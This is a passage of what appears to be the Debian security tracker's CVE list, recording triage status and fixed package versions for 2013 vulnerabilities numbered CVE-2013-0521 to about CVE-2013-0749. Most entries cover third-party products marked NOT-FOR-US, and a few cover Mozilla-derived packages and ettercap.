	[squeeze] - iceweasel
	[squeeze] - icedove
	- icedove 10.0.12-1
	- iceape 2.7.12-1
	[squeeze] - iceape
CVE-2013-0749 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0748 (The XBL.__proto__.toString implementation in Mozilla Firefox before 18 ...)
	- iceweasel 10.0.12esr-1
	[squeeze] - iceweasel
	[squeeze] - icedove
	- icedove 10.0.12-1
	- iceape 2.7.12-1
	[squeeze] - iceape
CVE-2013-0747 (The gPluginHandler.handleEvent function in the plugin handler in Mozil ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0746 (Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x ...)
	- iceweasel 10.0.12esr-1
	[squeeze] - iceweasel
	[squeeze] - icedove
	- icedove 10.0.12-1
	- iceape 2.7.12-1
	[squeeze] - iceape
CVE-2013-0745 (The AutoWrapperChanger class in Mozilla Firefox before 18.0, Firefox E ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0744 (Use-after-free vulnerability in the TableBackgroundPainter::TableBackg ...)
	- iceweasel 10.0.12esr-1
	[squeeze] - iceweasel
	- icedove 10.0.12-1
	[squeeze] - icedove
	- iceape 2.7.12-1
	[squeeze] - iceape
CVE-2013-0743 REJECTED
CVE-2013-0742 (Stack-based buffer overflow in Corel PDF Fusion 1.11 allows remote att ...)
	NOT-FOR-US: Corel PDF Fusion
CVE-2013-0741 (Cross-site scripting (XSS) vulnerability in imagegen.ashx in Percipien ...)
	NOT-FOR-US: Percipient Studios ImageGen
CVE-2013-0740 (Open redirect vulnerability in Dell OpenManage Server Administrator (O ...)
	NOT-FOR-US: Dell OpenManage Server Administrator
CVE-2013-0739 (Chamilo 1.9.4 has XSS due to improper validation of user-supplied inpu ...)
	NOT-FOR-US: Chamilo LMS
CVE-2013-0738 (Chamilo 1.9.4 has Multiple XSS and HTML Injection Vulnerabilities: blo ...)
	NOT-FOR-US: Chamilo LMS
CVE-2013-0737 (Cross-site scripting (XSS) vulnerability in BoltWire 3.5 and earlier a ...)
	NOT-FOR-US: BoltWire
CVE-2013-0736 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Ming ...)
	NOT-FOR-US: mingle forum plugin for wp
CVE-2013-0735 (Multiple SQL injection vulnerabilities in wpf.class.php in the Mingle ...)
	NOT-FOR-US: Mingle Forum Wordpress plugin
CVE-2013-0734 (Multiple cross-site scripting (XSS) vulnerabilities in the Mingle Foru ...)
	NOT-FOR-US: Mingle Forum Wordpress plugin
CVE-2013-0733 (Untrusted search path vulnerability in Corel PaintShop Pro X5 and X6 1 ...)
	NOT-FOR-US: Corel PaintShop Pro
CVE-2013-0732 (Heap-based buffer overflow in PDFCore8.dll in Nuance PDF Reader before ...)
	NOT-FOR-US: Nuance PDF Reader
CVE-2013-0731 (ajax.functions.php in the MailUp plugin before 1.3.3 for WordPress doe ...)
	NOT-FOR-US: MailUp plugin for Wordpress
CVE-2013-0730 (Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 4.x th ...)
	NOT-FOR-US: Newscoop
CVE-2013-0729 (Heap-based buffer overflow in Tracker Software PDF-XChange before 2.5. ...)
	NOT-FOR-US: Tracker Software PDF-XChange
CVE-2013-0728 (Multiple stack-based buffer overflows in NCSAddOn.dll in the ERDAS APO ...)
	NOT-FOR-US: ERDAS ECWP Browser Plugin
CVE-2013-0727 (Multiple untrusted search path vulnerabilities in Global Mapper 14.1.0 ...)
	NOT-FOR-US: Global Mapper
CVE-2013-0726 (Stack-based buffer overflow in the ERM_convert_to_correct_webpath func ...)
	NOT-FOR-US: ERDAS ER Viewer
CVE-2013-0725 (ERDAS ER Viewer 13.0 has dwmapi.dll and irml.dll libraries arbitrary c ...)
	NOT-FOR-US: ERDAS ER Viewer
CVE-2013-0724 (PHP remote file inclusion vulnerability in includes/generate-pdf.php i ...)
	NOT-FOR-US: Wordpress plugin ecommerce Shop Styling
CVE-2013-0723 (Multiple heap-based buffer overflows in etxrw.dll in Kingsoft Spreadsh ...)
	NOT-FOR-US: Kingsoft Spreadsheets
CVE-2013-0722 (Stack-based buffer overflow in the scan_load_hosts function in ec_scan ...)
	- ettercap 1:0.7.5.1-2 (low; bug #697987)
	[squeeze] - ettercap 1:0.7.3-2.1+squeeze1
	NOTE: https://www.openwall.com/lists/oss-security/2013/01/10/2
	NOTE: http://www.exploit-db.com/exploits/23945/
	NOTE: https://secunia.com/advisories/51731/
	NOTE: Proposed patch http://www.securation.com/files/2013/01/ec.patch
CVE-2013-0721 (wp-php-widget.php in the WP PHP widget plugin 1.0.2 for WordPress allo ...)
	NOT-FOR-US: WordPress plugin
CVE-2013-0720 (The COBIME application before 0.9.4 for Android uses weak permissions ...)
	NOT-FOR-US: COBIME
CVE-2013-0719 (The ArtIME Japanese Input application 1.1.2 and earlier for Android us ...)
	NOT-FOR-US: ArtIME Japanese Input application
CVE-2013-0718 (The Simeji application 4.8.1 and earlier for Android uses weak permiss ...)
	NOT-FOR-US: Simeji
CVE-2013-0717 (Multiple cross-site request forgery (CSRF) vulnerabilities in the web- ...)
	NOT-FOR-US: NEC Aterm routers
CVE-2013-0716 (The web server in Wind River VxWorks 5.5 through 6.9 allows remote att ...)
	NOT-FOR-US: Wind River VxWorks
CVE-2013-0715 (The WebCLI component in Wind River VxWorks 5.5 through 6.9 allows remo ...)
	NOT-FOR-US: Wind River VxWorks
CVE-2013-0714 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 allow ...)
	NOT-FOR-US: Wind River VxWorks
CVE-2013-0713 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 allow ...)
	NOT-FOR-US: Wind River VxWorks
CVE-2013-0712 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 allow ...)
	NOT-FOR-US: Wind River VxWorks
CVE-2013-0711 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 allow ...)
	NOT-FOR-US: Wind River VxWorks
CVE-2013-0710 (Buffer overflow in Kingsoft Writer 2007 and 2010 before 2724 allows re ...)
	NOT-FOR-US: Kingsoft Writer
CVE-2013-0709 (Cross-site scripting (XSS) vulnerability in dopvSTAR* 0091 allows remo ...)
	NOT-FOR-US: Bayashi dopvSTAR
CVE-2013-0708 (Cross-site scripting (XSS) vulnerability in dopvCOMET* 0009b allows re ...)
	NOT-FOR-US: Bayashi dopvCOMET
CVE-2013-0707 (Unspecified vulnerability in JustSystems Ichitaro 2006 and 2007, Ichit ...)
	NOT-FOR-US: JustSystems Ichitaro
CVE-2013-0706 (NEC Universal RAID Utility 1.40 Rev 680 and earlier, 2.31 Rev 1492 and ...)
	NOT-FOR-US: NEC Universal RAID Utility
CVE-2013-0705 (Directory traversal vulnerability in LSI 3ware Disk Manager (3DM) befo ...)
	NOT-FOR-US: LSI 3ware Disk Manager
CVE-2013-0704 (Directory traversal vulnerability in the GREE application before 1.3.3 ...)
	NOT-FOR-US: GREE Android app
CVE-2013-0703 (Cross-site scripting (XSS) vulnerability in imgboard.com imgboard befo ...)
	NOT-FOR-US: imgboard
CVE-2013-0702 (Cross-site scripting (XSS) vulnerability in Cybozu Garoon 2.0.0 throug ...)
	NOT-FOR-US: Cybozu Garoon
CVE-2013-0701 (SQL injection vulnerability in Cybozu Garoon 2.5.0 through 3.5.3 allow ...)
	NOT-FOR-US: Cybozu Garoon
CVE-2013-0700 (Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cau ...)
	NOT-FOR-US: Siemens SIMATIC
CVE-2013-0699 (The Galil RIO-47100 Pocket PLC allows remote attackers to cause a deni ...)
	NOT-FOR-US: Galil RIO-47100
CVE-2013-0698 REJECTED
CVE-2013-0697 REJECTED
CVE-2013-0696 REJECTED
CVE-2013-0695 REJECTED
CVE-2013-0694 (The Emerson Process Management ROC800 RTU with software 3.50 and earli ...)
	NOT-FOR-US: Emerson Process Management
CVE-2013-0693 (The kernel in ENEA OSE on the Emerson Process Management ROC800 RTU wi ...)
	NOT-FOR-US: Emerson Process Management
CVE-2013-0692 (The kernel in ENEA OSE on the Emerson Process Management ROC800 RTU wi ...)
	NOT-FOR-US: Emerson Process Management
CVE-2013-0691 REJECTED
CVE-2013-0690 REJECTED
CVE-2013-0689 (The TFTP server on the Emerson Process Management ROC800 RTU with soft ...)
	NOT-FOR-US: Emerson Process Management
CVE-2013-0688 (Cross-site scripting (XSS) vulnerability in Invensys Wonderware Inform ...)
	NOT-FOR-US: Invensys Wonderware Information Server
CVE-2013-0687 (The installer routine in Schneider Electric MiCOM S1 Studio uses world ...)
	NOT-FOR-US: Schneider Electric
CVE-2013-0686 (Invensys Wonderware Information Server (WIS) 4.0 SP1SP1, 4.5- Portal, ...)
	NOT-FOR-US: Invensys Wonderware Information Server
CVE-2013-0685 (Invensys Wonderware Information Server (WIS) 4.0 SP1SP1, 4.5- Portal, ...)
	NOT-FOR-US: Invensys Wonderware Information Server
CVE-2013-0684 (SQL injection vulnerability in Invensys Wonderware Information Server ...)
	NOT-FOR-US: Invensys Wonderware Information Server
CVE-2013-0683 (The DataSim and DataPid demonstration clients in Cogent Real-Time Syst ...)
	NOT-FOR-US: DataSim and DataPid demonstration clients
CVE-2013-0682 (Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub befo ...)
	NOT-FOR-US: Cogent DataHub
CVE-2013-0681 (Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub befo ...)
	NOT-FOR-US: Cogent DataHub
CVE-2013-0680 (Stack-based buffer overflow in the web server in Cogent Real-Time Syst ...)
	NOT-FOR-US: Cogent DataHub
CVE-2013-0679 (Directory traversal vulnerability in the web server in Siemens WinCC b ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0678 (Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and o ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0677 (The web server in Siemens WinCC before 7.2, as used in SIMATIC PCS7 be ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0676 (Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and o ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0675 (Buffer overflow in CCEServer (aka the central communications component ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0674 (Buffer overflow in the RegReader ActiveX control in Siemens WinCC befo ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0673 (Directory traversal vulnerability in the web interface in the Health M ...)
	NOT-FOR-US: MatrikonOPC
CVE-2013-0672 (Cross-site scripting (XSS) vulnerability in the HMI web application in ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0671 (Directory traversal vulnerability in Siemens WinCC (TIA Portal) 11 all ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0670 (CRLF injection vulnerability in the HMI web application in Siemens Win ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0669 (The HMI web application in Siemens WinCC (TIA Portal) 11 allows remote ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0668 (Multiple cross-site scripting (XSS) vulnerabilities in the HMI web app ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0667 (Cross-site scripting (XSS) vulnerability in the HMI web application in ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0666 (The configuration utility in MatrikonOPC Security Gateway 1.0 allows r ...)
	NOT-FOR-US: MatrikonOPC
CVE-2013-0665 (Schweitzer Engineering Laboratories (SEL) AcSELerator QuickSet before ...)
	NOT-FOR-US: Schweitzer Engineering Laboratories AcSELerator QuickSet
CVE-2013-0664 (The FactoryCast service on the Schneider Electric Quantum 140NOE77111 ...)
	NOT-FOR-US: Schneider Electric Quantum modules
CVE-2013-0663 (Cross-site request forgery (CSRF) vulnerability on the Schneider Elect ...)
	NOT-FOR-US: Schneider Electric Quantum modules
CVE-2013-0662 (Multiple stack-based buffer overflows in ModbusDrv.exe in Schneider El ...)
	NOT-FOR-US: Schneider Electric
CVE-2013-0661
	RESERVED
CVE-2013-0660
	RESERVED
CVE-2013-0659 (The debugging feature on the Siemens CP 1604 and CP 1616 interface car ...)
	NOT-FOR-US: Siemens Interface Card
CVE-2013-0658 (Heap-based buffer overflow in RFManagerService.exe in Schneider Electr ...)
	NOT-FOR-US: Schneider Electric Accutech Manager
CVE-2013-0657 (Stack-based buffer overflow in Schneider Electric Interactive Graphica ...)
	NOT-FOR-US: Schneider Electric IGSS
CVE-2013-0656 (Buffer overflow in a third-party ActiveX component in Siemens SIMATIC ...)
	NOT-FOR-US: Siemens SIMATIC
CVE-2013-0655 (The client in Schneider Electric Software Update (SESU) Utility 1.0.x ...)
	NOT-FOR-US: Schneider Electric SESU
CVE-2013-0654 (CimWebServer in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICIT ...)
	NOT-FOR-US: GE Intelligent Platforms Proficy
CVE-2013-0653 (Directory traversal vulnerability in substitute.bcl in the WebView Cim ...)
	NOT-FOR-US: GE Intelligent Platforms Proficy
CVE-2013-0652 (GE Intelligent Platforms Proficy Real-Time Information Portal does not ...)
	NOT-FOR-US: GE Intelligent Platforms Proficy
CVE-2013-0651 (The Portal installation process in GE Intelligent Platforms Proficy Re ...)
	NOT-FOR-US: GE Intelligent Platforms Proficy
CVE-2013-0650 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.68 ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0649 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0648 (Unspecified vulnerability in the ExternalInterface ActionScript functi ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0647 (Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0646 (Integer overflow in Adobe Flash Player before 10.3.183.68 and 11.x bef ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0645 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0644 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0643 (The Firefox sandbox in Adobe Flash Player before 10.3.183.67 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0642 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0641 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.4, 10.x bef ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-0640 (Adobe Reader and Acrobat 9.x before 9.5.4, 10.x before 10.1.6, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-0639 (Integer overflow in Adobe Flash Player before 10.3.183.63 and 11.x bef ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0638 (Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0637 (Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0636 (Stack-based buffer overflow in Adobe Shockwave Player before 12.0.0.11 ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-0635 (Adobe Shockwave Player before 12.0.0.112 allows attackers to execute a ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-0634 (Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0633 (Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x befo ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0632 (administrator.cfc in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-0631 (Adobe ColdFusion 9.0, 9.0.1, and 9.0.2 allows attackers to obtain sens ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-0630 (Buffer overflow in Adobe Flash Player before 10.3.183.50 and 11.x befo ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-0629 (Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10, when a password is not con ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-0628
	REJECTED
CVE-2013-0627 (Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.5.3 ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0626 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5 ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0625 (Adobe ColdFusion 9.0, 9.0.1, and 9.0.2, when a password is not configu ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-0624 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0623 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0622 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0621 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x bef ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0620 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0619 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0618 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0617 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x bef ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0616 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0615 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x bef ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0614 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0613 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x be ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0612 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x bef ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0611 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0610 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5 ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0609 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x be ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0608 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0607 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0606 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x bef ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0605 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0604 (Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0603 (Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0602 (Use-after-free vulnerability in Adobe Reader and Acrobat 9.x before 9. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0601 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0600 (Unspecified vulnerability on IBM WebSphere DataPower XC10 Appliance de ...)
	NOT-FOR-US: IBM WebSphere DataPower XC10 Appliance devices
CVE-2013-0599 (IBM Eclipse Help System (IEHS), as used in IBM Rational Directory Serv ...)
	NOT-FOR-US: IBM
CVE-2013-0598 (Cross-site request forgery (CSRF) vulnerability in the Web Client in I ...)
	NOT-FOR-US: IBM Rational ClearQuest
CVE-2013-0597 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Application ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0596 (Cross-site scripting (XSS) vulnerability in the Administrative console ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0595 (Multiple cross-site scripting (XSS) vulnerabilities in iNotes 8.5.x in ...)
	NOT-FOR-US: IBM Lotus Domino
CVE-2013-0594 (Open redirect vulnerability in IBM iNotes before 8.5.3 Fix Pack 6 and ...)
	NOT-FOR-US: IBM
CVE-2013-0593 (Unspecified vulnerability in the olch2x32 ActiveX control in IBM SPSS ...)
	NOT-FOR-US: IBM SPSS SamplePower
CVE-2013-0592 (Cross-site scripting (XSS) vulnerability in IBM iNotes before 8.5.3 Fi ...)
	NOT-FOR-US: IBM
CVE-2013-0591 (Cross-site scripting (XSS) vulnerability in iNotes 8.5.x in IBM Lotus ...)
	NOT-FOR-US: IBM Lotus Domino
CVE-2013-0590 (Cross-site scripting (XSS) vulnerability in iNotes 8.5.x in IBM Lotus ...)
	NOT-FOR-US: IBM Lotus Domino
CVE-2013-0589 (IBM iNotes before 8.5.3 Fix Pack 6 and 9.x before 9.0.1 allows remote ...)
	NOT-FOR-US: IBM
CVE-2013-0588
	RESERVED
CVE-2013-0587 (Multiple cross-site scripting (XSS) vulnerabilities in IBM WebSphere P ...)
	NOT-FOR-US: IBM InfoSphere
CVE-2013-0586 (Cross-site scripting (XSS) vulnerability in the server in IBM Cognos B ...)
	NOT-FOR-US: IBM Cognos
CVE-2013-0585 (Multiple cross-site scripting (XSS) vulnerabilities in IBM InfoSphere ...)
	NOT-FOR-US: IBM InfoSphere
CVE-2013-0584 (The Data Replication Dashboard component in IBM InfoSphere Replication ...)
	NOT-FOR-US: IBM InfoSphere Replication Server
CVE-2013-0583
	RESERVED
CVE-2013-0582 (Cross-site scripting (XSS) vulnerability in IBM Tivoli Federated Ident ...)
	NOT-FOR-US: IBM Tivoli Federated Identity Manager
CVE-2013-0581 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Business Pr ...)
	NOT-FOR-US: IBM
CVE-2013-0580 (Cross-site request forgery (CSRF) vulnerability in the Optim E-Busines ...)
	NOT-FOR-US: IBM
CVE-2013-0579 (The Optim E-Business Console in IBM Data Growth Solution for Oracle E- ...)
	NOT-FOR-US: IBM
CVE-2013-0578 (The Sterling Order Management APIs in IBM Sterling Multi-Channel Fulfi ...)
	NOT-FOR-US: IBM
CVE-2013-0577 (The Optim E-Business Console in IBM Data Growth Solution for Oracle E- ...)
	NOT-FOR-US: IBM
CVE-2013-0576 (Cross-site scripting (XSS) vulnerability in the Tivoli Enterprise Port ...)
	NOT-FOR-US: IBM Tivoli Monitoring
CVE-2013-0575
	RESERVED
CVE-2013-0574
	RESERVED
CVE-2013-0573
	RESERVED
CVE-2013-0572 (Cross-site scripting (XSS) vulnerability in IBM Document Connect for A ...)
	NOT-FOR-US: IBM Document Connect for Application Support Facility
CVE-2013-0571 (Cross-site scripting (XSS) vulnerability in IBM Document Connect for A ...)
	NOT-FOR-US: IBM Document Connect for Application Support Facility
CVE-2013-0570 (The Fibre Channel over Ethernet (FCoE) feature in IBM System Networkin ...)
	NOT-FOR-US: IBM
CVE-2013-0569 (Cross-site scripting (XSS) vulnerability in the Communities component ...)
	NOT-FOR-US: IBM Connections
CVE-2013-0568 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...)
	NOT-FOR-US: IBM
CVE-2013-0567 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...)
	NOT-FOR-US: IBM
CVE-2013-0566 (Multiple cross-site scripting (XSS) vulnerabilities in the (1) Acceler ...)
	NOT-FOR-US: IBM WebSphere Commerce
CVE-2013-0565 (Cross-site scripting (XSS) vulnerability in the RPC adapter for the We ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0564
	RESERVED
CVE-2013-0563
	RESERVED
CVE-2013-0562
	RESERVED
CVE-2013-0561
	RESERVED
CVE-2013-0560 (Multiple SQL injection vulnerabilities in IBM Sterling B2B Integrator ...)
	NOT-FOR-US: IBM
CVE-2013-0559 (Unspecified vulnerability in IBM API Management 2.0 before 2.0.0.1 all ...)
	NOT-FOR-US: IBM
CVE-2013-0558 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...)
	NOT-FOR-US: IBM
CVE-2013-0557
	RESERVED
CVE-2013-0556
	RESERVED
CVE-2013-0555
	RESERVED
CVE-2013-0554
	RESERVED
CVE-2013-0553 (The client implementation in IBM Sametime 8.5.1 through 8.5.2.1, as us ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-0552
	RESERVED
CVE-2013-0551 (The Basic Services component in IBM Tivoli Monitoring (ITM) 6.2.0 thro ...)
	NOT-FOR-US: IBM Tivoli Monitoring
CVE-2013-0550
	REJECTED
CVE-2013-0549 (Cross-site scripting (XSS) vulnerability in the Web Content Manager - ...)
	NOT-FOR-US: IBM WebSphere Portal
CVE-2013-0548 (Multiple cross-site scripting (XSS) vulnerabilities in the Basic Servi ...)
	NOT-FOR-US: IBM Tivoli
CVE-2013-0547
	RESERVED
CVE-2013-0546
	RESERVED
CVE-2013-0545
	RESERVED
CVE-2013-0544 (Directory traversal vulnerability in the Administrative Console in IBM ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0543 (IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0542 (Cross-site scripting (XSS) vulnerability in the Administrative console ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0541 (Buffer overflow in IBM WebSphere Application Server (WAS) 6.1 before 6 ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0540 (IBM WebSphere Application Server (WAS) Liberty Profile 8.5 before 8.5. ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0539 (An unspecified third-party component in IBM Sterling B2B Integrator 5. ...)
	NOT-FOR-US: IBM
CVE-2013-0538 (Cross-site scripting (XSS) vulnerability in IBM Lotus Notes 8.x before ...)
	NOT-FOR-US: IBM Lotus Notes
CVE-2013-0537 (The Enterprise Meeting Server in IBM Lotus Sametime 8.5.2 and 8.5.2.1 ...)
	NOT-FOR-US: IBM
CVE-2013-0536 (ntmulti.exe in the Multi User Profile Cleanup service in IBM Notes 8.0 ...)
	NOT-FOR-US: IBM Notes
CVE-2013-0535 (Multiple cross-site scripting (XSS) vulnerabilities in the Classic Mee ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-0534 (The Connect client in IBM Sametime 8.5.1, 8.5.1.1, 8.5.1.2, 8.5.2, and ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-0533 (Cross-site scripting (XSS) vulnerability in the Sametime Links server ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-0532 (Cross-site request forgery (CSRF) vulnerability in IBM Security AppSca ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2013-0531 (The SSL implementation in IBM Security AppScan Enterprise before 8.7.0 ...)
	NOT-FOR-US: IBM
CVE-2013-0530
	RESERVED
CVE-2013-0529 (The Browser in IBM Sterling Connect:Direct 1.4 before 1.4.0.11 and 1.5 ...)
	NOT-FOR-US: IBM Sterling Connect:Direct
CVE-2013-0528
	REJECTED
CVE-2013-0527 (The Browser in IBM Sterling Connect:Direct 1.4 before 1.4.0.11 and 1.5 ...)
	NOT-FOR-US: IBM Sterling Connect:Direct
CVE-2013-0526 (ping.php in Global Console Manager 16 (GCM16) and Global Console Manag ...)
	NOT-FOR-US: IBM GCM16
CVE-2013-0525 (Multiple cross-site scripting (XSS) vulnerabilities in IBM iNotes 8.5. ...)
	NOT-FOR-US: IBM Domino
CVE-2013-0524
	RESERVED
CVE-2013-0523 (IBM WebSphere Commerce Enterprise 5.6.x through 5.6.1.5, 6.0.x through ...)
	NOT-FOR-US: IBM WebSphere
CVE-2013-0522 (The Notes Client Single Logon feature in IBM Notes 8.0, 8.0.1, 8.0.2, ...)
	NOT-FOR-US: IBM
CVE-2013-0521
	RESERVED
